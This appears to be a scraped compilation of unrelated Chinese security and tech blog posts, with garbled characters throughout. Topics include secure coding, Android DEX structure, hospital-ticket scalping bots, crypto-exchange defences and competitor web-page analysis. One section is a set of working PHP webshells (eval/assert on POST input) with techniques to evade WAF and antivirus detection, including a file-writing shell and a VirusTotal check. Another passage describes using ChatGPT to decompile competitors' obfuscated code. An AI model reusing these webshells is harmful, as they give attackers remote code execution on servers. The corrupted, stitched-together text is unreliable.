第三方库和框架的破绽：许多应用程序依赖于第三方库和框架，如果不定期更新，就会在应用程序中引入破绽；注入攻打：注入攻打包含攻击者向应用程序的输出字段（如登录表单或搜寻框）中注入恶意代码或命令，以取得对应用程序或其根底数据库的未经受权的拜访；跨站脚本攻打（XSS）：XSS攻打包含攻击者向网站或Web应用程序中注入恶意代码，而后在用户的浏览器中执行，可能窃取敏感数据或代表用户执行未经受权的操作；不平安的认证和受权：设计不良或施行不当的身份验证和受权机制能够让攻击者绕过安全控制，拜访敏感数据或性能；日志记录和监控有余：如果没有足够的日志和监控，就很难发现和应答安全事件或确定平安问题的根本原因；挪动应用程序平安：随着挪动设施的遍及，确保挪动应用程序的平安变得越来越重要。挪动利用可能会受到各种攻打的影响，包含针对设施自身或应用程序后盾服务器的攻打；云平安：随着云计算的广泛应用，确保基于云应用程序的平安已变得至关重要。基于云的应用程序可能会受到各种攻打的影响，包含针对云基础设施、应用程序自身或存储在云中的数据的攻打。能够利用一种或多种平安编码合规措施，如OWASP Top 10、CWE Top 25和CERT规定集，来检测上述列表中的我的项目，以实现平安软件开发。 SAST工具如何帮忙确保安全软件工程的最佳实际？越来越多的企业开始投资软件平安开发和网络安全技术，其中包含像Klocwork这样的SAST工具。只管企业在网络安全覆盖范围方面曾经有了很大的停顿，但大部分工作还是集中在预先增强安全性和改良威逼检测上。 当初曾经有越来越多人意识到SAST的重要性，并在施行平安的开发过程中加以强制执行。 仅仅利用新的平安技术是不够的。软件自身须要填补危险破绽。因为如果窗户是开着的，那么在门上装再坚硬的锁也没用。 为什么保障软件开发的平安很艰难？安全软件的优先级不够 对于大多数开发人员来说，软件开发中的安全性并不是一个足够重要的优先事项。 有一个陈词滥调的观点，即您须要的是： 疾速进入市场；包含打算的所有性能；放弃高水平的品质。然而，您只能在这三者中抉择两者。尽管品质也经常被拿进去探讨是否能够摈弃，但通常被摈弃的是安全性。 性能和截止日期推动着开发的查看清单。而软件的安全性通常不是一个个性或要求，因而很少被关注到。 品质并不一定能保障平安 进步软件品质和完整性能够缩小缺点导致的安全漏洞。然而，质量保证（QA）通常不会思考黑客攻击。 嵌入式开发中的流动部件太多 嵌入式零碎宏大而简单。 包含新代码、遗留代码以及连贯组件。而且，嵌入式零碎在各种操作系统上运行。 有多个开发团队独特参加软件开发，并且散布在世界各地。 更不用说确保软件失常运行曾经足够艰难了，确保软件平安只会更艰难。 不足足够的平安培训 遗憾的是，许多参加软件开发的人不晓得如何分别平安问题。他们可能没有意识到软件需要对安全性的影响，或者他们意识不到不足平安需要会带来什么影响。 而且，他们不晓得安全性是如何从以下方面影响软件的： 建模架构设计实现测试筹备公布和部署因而，开发人员可能无奈设计平安的软件，平安的需要可能缺失，他们可能不理解谬误如何演变成了安全漏洞。 没有专门负责平安的团队 大多数的嵌入式开发团队都没有专门负责软件平安的岗位。相同，他们依附各种角色（从产品治理到开发再到QA）来确保软件平安，然而不肯定有用。 平安软件开发的十个最佳实际在理解到有可能存在上述一个或多个常见的AppSec问题的状况下，您无妨问问本人："在代码开发、实际、流程或方法学中，有哪些无效的办法能够确保安全？" 古代的观点认为，在软件开发过程中要无意识地思考和施行安全措施，以确保软件的安全性。 即便您能够应用最佳的测试工具链来扫描和剖析软件，在软件开发过程中也应该采纳各种实际和办法，能力在软件开发生命周期的每个阶段辨认和缩小潜在的平安威逼和弱点。 以下是平安软件开发的十个最佳实际： 1.威逼建模 威逼建模包含剖析软件体系结构，并辨认潜在的平安威逼和破绽。这有助于在设计时就思考到软件的安全性，并施行必要的安全控制。 平安编码开发人员必须恪守平安编码实际，例如输出验证、平安数据存储和平安通信协议。平安编码实际有助于避免常见的安全漏洞，例如SQL注入、跨站点脚本和缓冲区溢出攻打等。 代码审查代码审查包含审查开发人员编写的代码，辨认潜在的平安问题。这有助于在开发过程的晚期检测和纠正安全漏洞。 测试定期进行平安测试，包含浸透测试和破绽扫描，能够帮忙辨认软件中潜在的安全漏洞，有助于在部署软件之前修复平安问题。 平安配置管理配置管理能确保软件系统以平安的配置部署。这包含了配置访问控制、网络设置和其余与平安相干的设置，升高未经受权的拜访危险。 访问控制访问控制确保只有受权的人员能力拜访软件系统。这包含施行用户身份验证和受权机制，以及基于角色的访问控制。 定期更新和补丁定期更新软件和补丁能够帮忙解决安全漏洞，并升高安全漏洞的危险。放弃零碎中应用的所有软件组件的安全补丁和更新十分重要。 平安培训参加软件开发过程的开发人员和其余人员都应该定期的承受平安培训，确保他们理解平安的重要性和平安软件开发的最佳实际。 事件响应企业应制订明确定义的事件响应打算，来应答安全事件。这包含辨认潜在的安全事件、管制安全事件的影响，以及从安全事件中复原。 继续监控继续监控有助于实时检测和应答安全事件。这包含监控系统日志、网络流量和用户行为，以寻找任何安全漏洞的形迹。 通过遵循这些最佳实际，企业能够开发安全可靠的软件应用程序，抵挡潜在的平安威逼和破绽。在软件开发的每个阶段都应该优先思考平安，以避免未经受权的拜访并爱护敏感数据。 应用动态代码剖析工具来确保安全的软件开发动态代码剖析可能为平安的开发过程提供反对，因为半数以上的平安缺点是在源代码级别引入的。因而，在编写代码后尽早找到并修复谬误十分要害。 然而，许多开发人员不足平安培训。而且，在代码审查期间辨认平安问题可能很艰难，甚至是不可能的事。平安谬误可能是很奥妙的，即便是训练有素的开发人员也很容易漠视它。 动态代码剖析工具能够帮忙您补救这些差距，因为它们会标记出安全漏洞并减速代码审查。 应用动态剖析，开发人员能够辨认以下谬误： 内存透露违规拜访算数谬误数组和字符串溢出这能够最大限度地进步代码品质，并最小化谬误对最终产品和我的项目进度的影响。 此外，动态代码剖析工具，例如Helix QAC（用于C / C++）和Klocwork（用于C，C++，C#，Java，JavaScript，Python和Kotlin），能够用于恪守CERT C或MISRA编码规定。它们还能更快辨认CWE编码谬误。 作者简介： **Dzuy TranKlocwork和Helix QAC高级解决方案架构师，Perforce公司** DzuyTran在硬件和软件嵌入式零碎，RTOS，挪动应用程序和企业零碎的设计和开发方面有超过30年的教训。当客户遇到技术问题时，他会帮忙他们，帮助进行概念验证，并演示动态代码剖析工具，并帮忙领导客户进行 DevOps 施行流程和继续集成部署。Dzuy领有国立理工大学计算机科学和计算机工程硕士学位。文章起源：http://bit.ly/41rdMPn ...

1.动态免杀（assert.eval) <?phpeval($_POST['haha']);?><?phpassert($_POST['haha']);?>暗藏关键字（waf检测到assert，eval这个关键词，很大概率会被检测进去，那么咱们能够尝试用别的词来生成，具体的生成形式有很多种，这里列举一下常见的几种形式，其实成果都差不多。）-1拆解合并<?php$a = "a"."s";$b = "e"."r"."t";$c = $a.$b;$c($_POST['haha']);?><?phpfunction fun1($a){ $a($_POST['haha']);}fun1(assert);?><?php function fun1($a){ assert($a); } fun1($_POST['haha']);?><?phpclass me{ public $a = ''; function __destruct() { assert("$this->a"); }}$obj = new me;$obj->a = $_POST['haha'];?>-2调用函数（利用各种函数如array_map、array_key、preg_replace、@call_user_func、substr_replace来暗藏关键字）<?php@call_user_func(assert,$_POST['haha']);?><?php$a = substr_replace("assexx","rt",4);$a($_POST['haha']);?><?php$a = $_REQUEST['haha'];$b = "\n";?><?phpfunction fun(){ return $_POST['haha'];}@preg_replace("/nihao/e",fun(),"nihao woshi zj");?><?phpif(isset($_POST['file'])){ $d = 'data'; $$d = $_POST['haha'];//$data $f = 'fp'; $$f = fopen($_POST['file'],'wb');//$fp echo fwrite($fp,$data)?'save success':'save fail'; fclose($fp);}?>-3编码<?php$a = base64_decode("YXNzZXJ0");$a($_POST['haha']);?>-4冷门回调函数array_uintersect_uassoc函数来回调assert<?php $password = "LandGrey"; array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); ?>用该网站https://www.virustotal.com/测试

撰写背景最近在和奶奶视频的时候，在疏导她注册抖音，让她有工夫看看里面更加精彩的世界，而不是围绕着咱们的一日三餐，然而注册的时候，要让她滑动滑块验证码去失去短信验证码（要我说，这真的很无语，间接发送手机验证码不行吗？），然而她的手指没有那么灵便，老是滑不到适合地位，我只能说等我五一回去再给注册了。 因为这件事，我忽然想到，是不是能够设计一个适配老人的验证码，说干就干！ 当然，我也只是简略的从几个方面去做适配，而不会太深刻，毕竟只是个小菜鸟啦。 ok，咱们开始吧。 咱们能够从哪几个方面去做适配？老人的认知和技术水平不同，会导致他们在应用最新的APP的时候，会碰到不会应用、看不清图片、触摸不灵敏等问题，因而，咱们能够从几个方面去做优化： 1.应用简略的验证码： 这是最根底的一步。对于老年人来说，图形、语音或文字验证码都可能很难了解。所以，咱们在设计验证码的时候，须要尽量应用简略的、易于辨认的验证码，这样他们就能更容易地实现验证过程。举个例子，应用简略的数学问题或选择题等（可能即便这样，对于老人来说，也是过于艰难了，因为他们可能了解不了。）相同的例子就是12306那种，各种奇葩问题和图形，齐全是断绝了老人应用的可能性。 2.减少可拜访性选项： 老年人的问题可能是多种多样的，比方眼神不好，或者听力不行，因而，咱们如果能为老年人提供可拜访性选项，如语音验证码或通过邮件或短信收到验证码等，那么久能够使他们更容易地实现验证过程。 3.减少反馈机制： 这个是很必要的。如果咱们在设计验证码的时候，为老年人提供明确的反馈，通知他们他们是否曾经正确地输出验证码，那么能够帮忙他们防止犯错和挫败感（老是输错，可能也是不行的，哎）。 4.优化验证码设计： 这个是下面所有计划的根底。对于老年人来说，应用亮堂的色彩、更大的字体、更清晰的字体等设计元素能够使验证码更容易辨认和应用。这样，能力让下面所有的倡议都变得可行。 具体代码示例列举完之后，咱们就来看看具体代码吧。 1. 应用简略的代码 a. 数学问题验证码示例： var a = Math.floor(Math.random() * 10);var b = Math.floor(Math.random() * 10);var answer = a + b;var userAnswer = prompt("What is " + a + " + " + b + "?");if (userAnswer == answer) { alert("You are human!");} else { alert("Wrong answer.");}b. 选择题验证码示例： <div class="captcha"> <p>What color is a banana?</p> <label><input type="radio" name="captcha" value="yellow">Yellow</label> <label><input type="radio" name="captcha" value="red">Red</label> <label><input type="radio" name="captcha" value="blue">Blue</label></div><style> .captcha p { font-size: 20px; font-weight: bold; } .captcha label { font-size: 16px; display: block; margin-bottom: 10px; }</style>如果有其余适合的，也能够补充~ ...

DEX文件简介平安圈的敌人们，对于DEX文件应该是比拟理解的。咱们这次就简略介绍一下吧： DEX文件（Dalvik Executable）是一种专为 Android 操作系统设计的可执行文件格局。DEX文件蕴含了由 Java 语言编写的程序的字节码，这些程序在运行时被 Dalvik 虚拟机（DVM）解释执行。 在 Android 利用程序开发中，Java 代码通过编译器编译生成Java字节码文件（.class文件），而后通过工具将字节码文件转换为DEX格局，最初打包成APK文件供装置和运行。因为 Android 设施的处理器架构和Java虚拟机的差别，所以须要将Java字节码转换为DEX格局，以便在Dalvik虚拟机上运行。 DEX文件的长处： 1.可能高效地应用内存和处理器资源，这是因为它采纳了基于寄存器的架构，绝对于传统的基于堆栈的Java虚拟机，在执行Java程序时，可能更快地加载和执行代码。 2.DEX文件反对在利用程序运行时动静加载类和办法，提供了更高的灵活性。 所以咱们如果想要理解加固解决方案如何帮忙Android 利用反抗逆向和破解，首先须要理解DEX文件到底是什么样的。 DEX文件格式解析1.文件构造展现 DEX文件在010中的体现 2.文件构造详解struct Header { uint8_t magic[8]; // dex版本标识 uint32_t checksum; // adler32校验和 uint8_t signature[kShalDigestSize]; // SHA-1哈希值 uint32_t file_size; // 文件大小 uint32_t header_size; //Header构造大小 uint32_t endian_tag; //字节序标记 uint32_t link_size; // 链接段大小 uint32_t link_off; // 链接段偏移 uint32_t map_off; //映射项偏移 uint32_t string_ids_size; //字符串标识符列表个数 uint32_t string_ids_off; //字符串标识符列表偏移 uint32_t type_ids_size; //类型标识符列表个数 uint32_t type ids_off; //类型标识符列表偏移 uint32_t proto_ids_size; //办法原型标识符列表个数 uint32_t proto_ids_off; //办法原型标识符列表偏移 uint32 t field ids size; //字段标识符列表个数 uint32_t field_ids_off; //字段标识符列表偏移 uint32 t method_ids_size; //办法标识符列表个数 uint32_t method_ids_off; //办法标识符列表偏移 uint32_t class_defs_size; //类定义列表个数 uint32_t class_defs_off; //类定义列表偏移 uint32_t data_size; //数据区大小 uint32_t data_off; //数据区偏移}；文件头 ...

随着网络威逼的更加频繁，企业面临的平安问题也越来越多，传统的平安能力在面对日益增长的平安问题时显得顾此失彼。 SOAR借助平安编排和自动化技术，将人工操作和技术集成在一起，自动化实现平安处理，帮忙企业更快地响应安全事件，大幅缩小人为误差。 SOAR可能对现有平安产品、网络设备、IT 零碎和 SaaS 服务等根底能力进行兼顾调度，可基于可视化剧本编排和调度执行引擎，发展有逻辑、有程序的自动化流程操作，实现日常安全事件经营和突发事件处理过程自动化。 想理解更多的SOAR平安实战案例，请锁定4月20日在线直播。 直播工夫：4月20号（周四）下午15:00 直播福利：直播间不定时会抽出顶象周边福利，直播嘉宾的福利包含但不仅限于——1、第二本业务平安专业书籍的联结署名权（首部图书）；2、现金处分；3、顶象周边。 同时，欢送各位圈内圈外大佬以及合作伙伴积极参与到咱们第二季的业务平安大讲堂直播流动中来，有动向的可增加小助手沟通参加。 本期主讲嘉宾 孙聪，平安征询参谋，雾帜智能公司SOAR售前经理；此前曾服务于华清信安、深服气等公司；领有多年平安行业教训，次要服务于网络安全治理、SOAR平安产品厂商，为银行、证券公司提供平安、治理价值计划。 Tips：本期直播将在顶象视频号&钉钉&B站顶象直播间&CSDN顶象技术直播间多平台同步直播，感兴趣的同学记得肯定要提前锁定直播间哦！

北京的李先生要挂某出名医院的号，间断2周挂号，始终未胜利。无奈之下，李先生只能寻求“号贩子”的帮忙，并最终加价500元购买到了一个号。这不仅节约了李先生的工夫，也减少了医治老本，对于他的身心健康造成了肯定的影响。 顶象进攻云业务业务平安情报中心监测发现，自2022年11月起，多个医疗挂号平台服务优质号源总是被一抢而光，患者想要挂到专家号都只能通过“号贩子”之手。“号贩子”通过舞弊形式囤积优质号源，再进行高价转卖获利。该行为导致多个医疗挂号网站造成了无奈失常挂号，重大扰乱医疗秩序，更会导致平台用户信息批量泄露的严重后果。 猖狂的“号贩子”在社交网络平台中，输出“北京挂号”“挂号预约”“代办挂号”等关键词后，就能找到号贩子的形迹。有些号贩子甚至会间接应用“某医院挂号”“帮助挂号”“挂号跑腿”“挂号免费”等宣传语。 “号贩子”，是一些在号源紧缺的大医院内做倒号生意的人，他们或者雇人整夜排队，或者通过网络等渠道先占有号源，也不排除局部与医院工作人员团结的状况产生，而后加价将排来的专家号，卖给须要的患者，从中获利。组织者每月可从一位专家身上赚取数万元。 很多“号贩子”被包装成医药从业者。比方，列举出十多家北京三甲医院目录和某些科室出名专家名单，而后宣称“北京医院怎样才能挂上号”、“门诊加号、特需加号都是强项，难办的活儿找咱们就对了”、“业余代挂北京各大出名三甲医院专家号”……最初还会附上手机号、微信号等联系方式。 2016年5月4日，国家卫生计生委等八部门联结印发了集中整治“号贩子”和“网络医托”专项口头计划，八部门成立了专门的工作协调办公室，且明确在年内分三阶段严打“号贩子”，将来无关部门还将建设“号贩子”黑名单，并纳入社会信用体系。在多个国家部门的联手打击下，“号贩子”们一度匿影藏形。 随着互联网医院的成立，网络预约挂号服务的遍及，号贩子们再度沉闷起来。有了互联网作为掩护，号贩子的抢号伎俩信息化水平也日渐进步。一些号贩子通过应用订制的非法软件，攻打官网挂号平台进行抢号。 2019年10月14日，北京东城区人民法院以毁坏计算机信息零碎罪判处高某等3名“号贩子”9个月至一年6个月有期徒刑。2021年8月，北京市西城区人民法院审结的一起刑事案件中，“号贩子”孙某支使别人制作抢号软件，冲破了北京某医院后盾服务器的防护措施限度，抢号牟利，西城法院以毁坏计算机信息零碎罪，判处孙某有期徒刑2年，判处邵某有期徒刑1年6个月。 “号贩子”的运作门路自2022年11月份起，顶象进攻云业务平安情报中心陆续发现，多个挂号服务平台存在批量抢号行为，重大影响挂号平台的业务经营。 “号贩子”有本人的营销人员，通过微博、微信、QQ等社交软件交易，还会开明微信公众号，在下面间接售卖挂号服务，保护长期客户关系。 1、患者通过社交平台、社区论坛分割到“号贩子”。 2、“号贩子”理解患者须要挂号的医院、日期、医生等信息，并要求提供患者提前领取款项。用个别是在本来的挂号费的根底上加服务费，依据号源抢号老本难度状况加价几十至几百元不等。号贩子，承诺挂不到号全额退款。 3、而后，“号贩子”要求患者提供姓名、手机号、身份证号个人隐私信息，甚至是某些某挂号平台的账号以及明码。 4、“号贩子”将抢单号信息同步给黑灰产，蕴含具体的科室、医生、时间段等具体号源信息，以及下单患者的个人信息。 5、黑灰产输出患者信息去抢号，抢到号源后，患者在本人的挂号平台账户内能够看到；如果事先未提供患者信息，号贩子会用其余个人信息抢号，有患者买号后，紧急退掉号，而后再迅速用患者信息抢回。如果切实找不到患者买家，就在到期前勾销挂号。交易过程中，黑产能够轻易获取大量实在病患的个人信息、账号以及明码，壮大本人的抢号信息库。 “号贩子”背地团伙应用的舞弊工具“号贩子”背地的黑灰产团队领有业余的挂号设施，抢号软件，通过代抢号形式赚取服务费用。他们有本人的营销人员，通过微博、微信、QQ等社交软件交易，还会开明微信公众号，在下面间接售卖挂号服务，保护长期客户关系。 不少“黑灰产是用秒杀器先把号源占了，而后去兜生意，兜到生意当前，把手上这个占位的号源退掉，号源就会回到可预约的状态，黑灰产就能够在同一时间疾速用患者的身份证信息挂号，用这种形式保障胜利挂号率。费用个别是在本来的挂号费的根底上加服务费，依据号源抢号老本难度状况加价几十至几百元不等。 黑灰产有业余的自动化脚本、设施牧场、代理/秒拨软件、打码平台等业余舞弊工具。 抢号软件。惯例的挂号业务流程，选医生-选工夫-提交预约，主动挂号软件制订脚本程序，自动化实现重复提交预约。普通用户须要2-5分钟能力实现的流程，号贩子的抢号软件，可能模仿人的操作，主动登录、选医生、选工夫、提交预约的挂号行为，2-3秒就能够实现成千上百人约号挂号，由此呈现导致了很多时候预约号刚放进去,随即被预约结束的景象。 黑灰产通过Charles、Brup等抓包工具剖析挂号软件的的申请，而后用脚本模仿挂号平台的登录、选医生、选工夫、提交预约的挂号行为，通过脚本批量自动化运行。 因为大多数医院相继采取了实名认证的对策，因而黑灰产须要患者提供个人信息，蕴含患者姓名、手机号、身份证号、平台的账号、以及明码等个人隐私信息。 针对挂号需进行人脸验证的要求，黑灰产还会要求有挂号需要的患者提前录制好舞弊的人脸视频，绕过挂号平台的人脸验证形式，通过脚本的形式劫持挂号页面、获取号源。 群控平台。群控平台指的是能够实现通过一台电脑批量管制上百到上万台手机，通过群控工具，能够实现一台终端对多台手机的管制，与改机工具进行搭配，能够短时间内制作成千上万个不同的设施信息。联合代理IP软件，秒级切换IP地址。能够实现在短时间内切换大量患者信息进行抢号。 代理/秒拨软件。秒拨软件能够调用国内甚至国外的ADSL宽带动静IP资源，黑产分子通过应用秒拨客户端软件，只有进行简略配置，就能够实现IP的“主动切换”、“秒级切换”、“断线重拨”等服务。可用于躲避挂号平台对IP地址拜访频率限度的相干进攻策略。 打码平台。打码平台次要是一个数据录入的工作台，其题目次要来源于各个平台的验证环节验证码中的文字、图像、坐标等。验证打码是一种区别用户是计算机还是人的公共品种泛滥的验证码全自动程序。这个问题能够由计算机生成并评判，然而必须只有人类能力解答。黑产技术上无奈辨认的验证码通常会通过人工打码形式进行破解。 如何无效治理“号贩子”如何保障医院挂号的公平性和合理性，应该引起医院和政府的高度重视。一方面，医院应该增强其挂号零碎的安全性和管理机制，尽量避免黑市交易和挂号信息泄露。另一方面，政府应该疏导社会各界独特参加改善医疗资源分配的现状，加大对于“号贩子”和违规经营者的打击，保护患者合法权益。 首先，医院须要增强在线挂号零碎的平安保障。能够引进先进的技术手段，如人脸识别、图形验证码等，进步病患挂号的难度，从而缩小黄牛党的机会。同时，建设无效的监管机制，对患者的信息进行严格的治理和爱护，防止黑客攻击和数据泄露。 其次，医院应该增强与患者之间的沟通和交换，及时公布信息。医院能够通过微信公众号、短信、电话等多种形式向患者公布专家排班信息和挂号工夫，定期更新排队等待状况和勾销预约的提醒。这样能够防止患者因为排队工夫过长而抉择购买黄牛票，也不便患者理解状况作出正当的决策。 此外，还能够优化医院的排队机制，采取先到先得的零碎，缩小外部关系和关系网烦扰的可能性。同时，医院可适当减少预约挂号的数量，防止挂号资源适度集中，造成无票可挂的状况，从而给号贩子提供了可乘之机。 最初，政府和公安部门也应该增强打击力度，严厉打击黄牛党的违法犯罪行为，加大对于黄牛党的惩办力度。例如增强巡逻力度，在线上对号贩子开展网络追踪和打击，突破其收买、倒卖的黑产链条。 总之，“号贩子”倒卖号源是一件十分顽劣的事件，不仅消耗患者金钱，还重大扰乱了接诊流程。因而，医院和政府应该独特采取无力的措施并不断完善在线挂号零碎，打击号贩子，爱护病患利益，建设谐和的医疗环境。 技术端的防控倡议针对以上“号贩子”的特点和刷号抢号的危险特色，顶象进攻云业务平安情报中心倡议： 保障客户端平安。从客户端平安思考，APP的IOS渠道和Android渠道都倡议加终端加固，通过加固技术，实现端平安防护，如Android端的DEX文件爱护、SO文件爱护、资源文件爱护、数据文件等进行深度混同、加固爱护，让黑产无奈间接对APP进行逆向、破解。 保障通信传输平安。在终端减少环境检测等模块后，环境检测模块产生的数据往往没有和业务数据进行绑定，这就造成黑产有可能会篡改报文中的一些数据，避免终端平安检测模块的数据被篡改和冒用。 通过IP地址和手机号防备。基于风控数据、历史用户数据，积淀并保护对应黑白名单数据，包含用户ID，IP地址，设施ID，患者身份证号，联系人手机号等数据维度。此外，号贩子用自动化程序攻打时，为了躲避相干IP地址频次限度防控策略，通常会抉择IP代理池组合应用。通过秒级切换海量IP来实现高频拜访，应用IP黑库能够笼罩此类危险IP。 检测设施端危险。对设施运行进行检测，辨认指纹ID是否非法、端是否有群控、调试、模拟器、注入、VPN、代理等特色，限度同一设施短时间尝试登录大量账号、同设施短时间切换大量IP、IP短时间高频拜访等行为维度检测，针对登录场景同账号短时间明码谬误次数限度，挂号场景同设施关联大量不同病患信息等。 通过登录端防备。“号贩子”在登录环节次要是以撞库、明码爆破自动化程序盗号，在挂号环节应用主动挂号机进行批量抢号。对于辨认机器行为，轻部署且最简略的辨认工具就是行为验证码，在登录、挂号环节加上行为验证码对申请进行人机校验，可无效拦挡此类号贩子攻打。 通过风控规定防备。通过引擎配置登录场景防撞库、防明码爆破以及挂号场景防号贩子抢号策略规定，从设施行为、用户行为、以及IP地址危险等维度进行危险防控，对申请进行危险分层。业务端联合引擎返回的危险等级进行分层处理。 建设专属模型。线上数据有肯定积攒当前，通过风控数据以及业务的积淀数据，对用户行为进行建模，模型的输入能够间接在风控策略中应用。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

背景介绍2022 年初始，寰球加密货币总市值达到近 3 万亿美元，仿佛所有都会越来越好，会有越来越多对区块链充满希望的人入场。然而，重大震荡岂但冲击市场，也击碎局部参与者的信奉。因为加密货币价格暴涨、交易所暴雷的市场冲击，包含 Terra 解体、Celsius Network 和 Voyager Digital 申请破产、Three Arrows Capital 开张以及 FTX 暴雷，这些冲击就像多米诺骨牌，一环接一环波及整个市场，导致整个加密市场总市值蒸发约 2 万亿美元。 依据慢雾区块链被黑事件档案库（SlowMist Hacked）统计，2022 年安全事件共 303件，损失高达37.77 亿美元（按事发价格计算）。 因为不足对立行业标准和无效的监管，很多数字货币交易平台的平安防护不够。尤其在账户的注册、登录、验证、业务危险警示以及平台、客户端的破绽防护上不足无效保障，从而导致黑客可能轻松窃取到用户账户，进而对账户进行交易交易、批改信息、提现等操作。 三大平安威逼随着区块链的倒退，以及加密数字货币的带来财产效应，各种数字货币成为黑客关注的焦点。黑客不仅利用钓鱼、木马等形式在很多软件、平台和集体设施上进行数字货币的“挖矿”，更间接瞄准了数字货币的交易平台。 依据币安布告以及既往数字货币平台遭攻打的案例剖析，数字货币交易平台次要面临以下平安问题： 1、账户爱护体系弱：传统的明码、密钥辨认用户身份的模式，无奈分别账户真伪和平安，导致黑客可能假冒用户进行交易、提现等； 2、平台存在业务破绽：平台的零碎和内部拜访接口存在业务安全漏洞，导致黑客可能利用来施行非法操作，比方卖出用户资产、窃取用户要害数据； 3、不足智能风控的防护：因为未配置关键环节的风控辨认技术，导致平台的非法交易、非法操作等行为不可能被及时发现。 可用的平安解决方案1.在互联网环境，部署无感验证和设施指纹技术设施指纹对拜访设施进行惟一标识，为后续的危险决策提供重要的设施维度数据，并对设施运行环境进行危险检测；无感验证联合了设施指纹、行为特色、拜访频率、地理位置等多项技术，精准断定人机操作，无效拦挡撞库、API破绽探测、批量注册、机器发动的资产转移等机器行为，并对疑似危险进行二次验证，失常用户则免打搅。 2.在用户的挪动客户端上，部署平安SDK通过基于白盒加密技术的终端数据保护性能，以及高强度的网络传输数据爱护性能，实时监测防护客户端所面临的危险威逼，无效防备黑客通过调用API发动威逼攻打。同时在客户网站的Web页面上，提供独有产品对Web/H5文件进行加密、混同、压缩，能够无效避免Web/H5源代码被黑灰产复制、破解。 3.在交易平台的内网环境，部署实时危险决策引擎依据设施指纹、IP、账号、地区、工夫序列等多维度参数，剖析并开掘访问者的行为特色和关联关系，对外部拜访的各类申请进行实时危险辨认，平面判断是黑产威逼还是失常用户。而智能剖析平台则提供了灵便的离线数据分析，可进一步从历史数据中挖掘用户的失常行为特色及模型，并将开掘的黑白数据及模型部署到上述决策引擎上，疾速对后续拜访进行更无效的异样发现，从而造成了具备攻防降级能力的智能风控闭环。 结语纵览整个 2022，“动荡”一词贯通全年。只管仍有暴雷的余震回荡，只管咱们正在经验寒冬，但任何事物都无奈扭转区块链倒退的方向，只有如履薄冰，认真做有利于行业倒退的事件能力巩固短暂。无论如何，咱们仍期待着区块链行业在 2023 年的倒退。 计划征询：收费试用 附：损失TOP10安全事件1 Ronin Network 损失超 6.1 亿美元2 BNBChain 受到破绽利用3 Wormhole 损失超 3 亿美元4 Beanstalk Farms 遭闪电贷和提案攻打5 Wintermute 损失 1.6 亿美元6 Nomad 桥蒙受黑客攻击 7 Elrond 呈现安全漏洞8 Mango 因价格操纵被提取 1 亿 美元 9 Harmony 损失超 1 亿美元10 Qubit 遭攻打损失 8000 万美元 ...

作者：京东批发 周亮堂 一、友商网页剖析1.1 亚马逊亚马逊商详地址： https://www.amazon.com/OtterBox-Commuter-Case-iPhone-Packaging 所有交互事件在页面初始化时，不进行下发，期待通过 js 申请后下发 具体点击事件js内容采纳自执行形式，避免代码格式化。【无奈调用 Chrome 自带的代码格式化工具】采纳自研式框架，非传统 react / vue / angular。大量通过 data-xx 标签进行数据传递，导致标签构造较为简单。 1.2 淘宝次要配合接口进行加密，采纳多字段烦扰，模板化加载。下发大量的模版数据，之后通过客户端进行填充。 客户端代码为传统的一般加密模式 1.3 拼多多传统一般加密形式，应用 React 框架。【有显著的 React 语法糖】要害的商详数据，须要强制进行登录操作，能够对账号进行封禁。 二、攻击者角度[Web逆向]数某风控JS算法剖析 惯例网页加密调式Crack App| 某 H5 App 反调试反抗 反调式 APP 内 WebviewPuppeteer融入调试流程，调试体验爽翻了！ 可模仿用户理论点击流程，进行流程化操作，此类形式，比拟难以辨别Node.js 平安最佳实际常见的 Node JS 官网公布的被攻打类型。参考：NodeJS 官网领导手册通过几行 JS 就能够读取电脑上的所有数据？旁路攻打，通过内存响应速度获取用户明码信息Qwik JS框架将JS代码的拆分从常见的「编译时」（比方webpack分块）、「运行时」（比方dynamic import），变为「交互时」。只有用户操作时，才会进行注入加载。实际：天猫汽车商详页的SSR革新实际 天猫汽车商详页，革新原理实质上是基于 Qwik JS 。聊聊前端平安之CSRF非代码透露类，惯例类型Web 攻打，基于代码破解后XSS攻打：跨站脚本攻打(Cross-Site Scripting)，攻打指标是为了盗取存储在客户端的cookie或者其余网站用于辨认客户端身份的敏感信息。一旦获取到非法用户的信息后，攻击者甚至能够混充非法用户与网站进行交互。CSRF（Cross-site request forgery）跨站申请伪造：攻击者诱导受害者进入第三方网站，在第三方网站中，向被攻打网站发送跨站申请。利用受害者在被攻打网站曾经获取的注册凭证，绕过后盾的用户验证，达到假冒用户对被攻打的网站执行某项操作的目标。网络劫持攻打，次要是通过一些代理服务器，或者wifi等有中间件的网络申请，进行劫持，不法分子通过这种形式获取到用户的信息。控制台注入代码，不法分子通过各种提醒诱骗用户在控制台做一些操作，从而获取用户信息。钓鱼攻打，电子邮件钓鱼：群发邮件，坑骗用户点击歹意的链接或附件，获取有价值的信息网站钓鱼：在网站上伪造一个网站，通常是模拟非法的某个网站。为了坑骗用户点击这个网站还会采取些辅助技术，比方钓鱼邮件、短信、电话防钓鱼SPF记录，SPF是为了防备垃圾邮件而提出来的一种DNS记录类型，它是一种TXT类型的记录，它用于注销某个域名领有的用来外发邮件的所有IP地址。SafeBrowsing API，谷歌的一个随时能够通过互联网拜访的API,容许容许浏览器在渲染之前检测URL的正确性。DDOS：分布式拒绝服务攻打（Distributed Denial of Service），简略说就是发送大量申请是使服务器瘫痪SQL注入攻打，通过对web连贯的数据库发送歹意的SQL语句而产生的攻打，从而产生安全隐患和对网站的威逼，能够造成逃过验证或者私密信息泄露等危害点击劫持，点击劫持是指在一个Web页面中暗藏了一个通明的iframe，用外层假页面诱导用户点击，实际上是在暗藏的frame上触发了点击事件进行一些用户不知情的操作。AI 染指解释代码，减速代码反编译过程比方将友商代码放入 chatgpt 进行释义 这个只是局部代码，如果将残缺代码，一段一段进行剖析，你就能够失去残缺上下文，不须要靠人去一段一段读取代码。 ...

